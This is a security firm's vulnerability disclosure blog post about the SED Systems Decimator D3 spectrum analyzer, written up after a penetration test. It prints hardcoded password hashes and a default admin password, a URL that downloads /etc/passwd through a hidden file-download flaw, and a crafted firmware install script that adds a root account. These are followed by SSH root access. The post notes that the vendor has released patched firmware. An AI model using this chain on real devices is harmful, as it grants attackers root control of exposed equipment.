Blog

Multiple Vulnerabilities in SED Systems’ Decimator D3

08/10/2015 | Author: Admin

Multiple Vulnerabilities in SED Systems’ Decimator D3

During a recent penetration test, MDSec found several vulnerabilities in a RF spectrum analyzer that was exposed to the Internet. The SED Systems Decimator D3 is the third generation of SED’s popular Decimator spectrum analyzer, providing a frequency range of 5MHz to 3GHz and lightning fast measurement refresh rate. More information on Sed Systems Decimator D3 devices can be found at the vendor’s website.

Identification of the vulnerable device can be performed by scanning for TCP port 9784 which offers a default remote API. When connected to this service it will announce itself with “connected” similar to the following output:

Connected to x.x.x.x.
Escape character is '^]'.
connected
status
status:3.1,3.0.12-1,0,0,41.0,Valid,Valid,540,-1.0,-1.0,5.1,11.4,-1.0
ping
ping:ok

The web service by default has a user interface for accessing the RF analyzer capability. Using the API, the device can also give raw remote access to I/Q samples which would provide a means to remotely sniff the RF spectrum. The Web Configuration Manager can be found under the “/cgi-bin/wcm.cgi” URI. Firmware for the device was downloaded and several vulnerabilities were found to be present within the device services.

Firstly, the device was shipped with hardcoded credentials and had existed in the default firmware since at least February 2013. The following entries can be found in the “/etc/passwd” file:

root:$1$zfy/fmyt$khz2yIyTFDoCkhxWw7eX8.:0:0:root:/:/bin/sh
admin:$1$$CoERg7ynjYLsj2j4glJ34.:1000:0:root:/:/bin/webonly

While the admin user has a default password of “admin” at this time the root user’s password is unknown, however there is no documented way of changing this trivially in a device. Using the “admin” user it was possible to obtain a web session to the Web Configuration Manager application and exploit a hidden arbitary file download vulnerability discovered by reverse engineering the firmware:

http://x.x.x.x/cgi-bin/wcm.cgi?sessionid=009d45ecbabe015babe3300f&download=true&fullfilename=/etc/passwd

This will allow you to download any file from the device due to the “admin” user having equivalent root privileges. To execute arbitary code a third vulnerability was exploited, this time within the firmware flashing routine. By uploading a crafted tarball that contains a “install” script in its root, the device will accept your firmware and then attempt to execute “./install”. To prevent bricking/modification of the device, the flashing process can then be subsequently canceled. The vulnerability exist in the “/usr/bin/install_flash” command, which after using “tar” to unpack an archive to a tmp folder of “/tmp/PID_of_tar” does the following:

80 # If the archive contained its own install script then use that
81
82 if [ -x ./install ]; then
83 ./install $all_args
84 rc=$?
85 exit $rc
86 fi
87

Using this vulnerability it is possible to upload a “.tar” file containing an “install” file that looks like the following to obtain a root user account with “adm1n/admin”:

cat install
#!/bin/sh
echo adm1n:\$1\$\$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/sh >> /etc/passwd

Using the newly created account it is possible to now SSH remotely to the device as PermitRootLogin is enabled by default. The screen shot below shows successful exploitation of this weakness to obtain remote root privileges:

shell

MDSec have since provided details of these vulnerabilities to the manufacturer who have updated and released a new firmware image which is intended to address these weaknesses. The new firmware patches have not been verified however it is advised that all users of SED Systems D3 decimator devices update to the latest firmware version to prevent exploitation of these weaknesses by malicious parties.

This blog post was written by @hackerfantastic.

Ready to start testing your applications?

Speak to one of our industry experts and find out how MDSec can help your business.

+44 (0) 1625 263 503

contact@mdsec.co.uk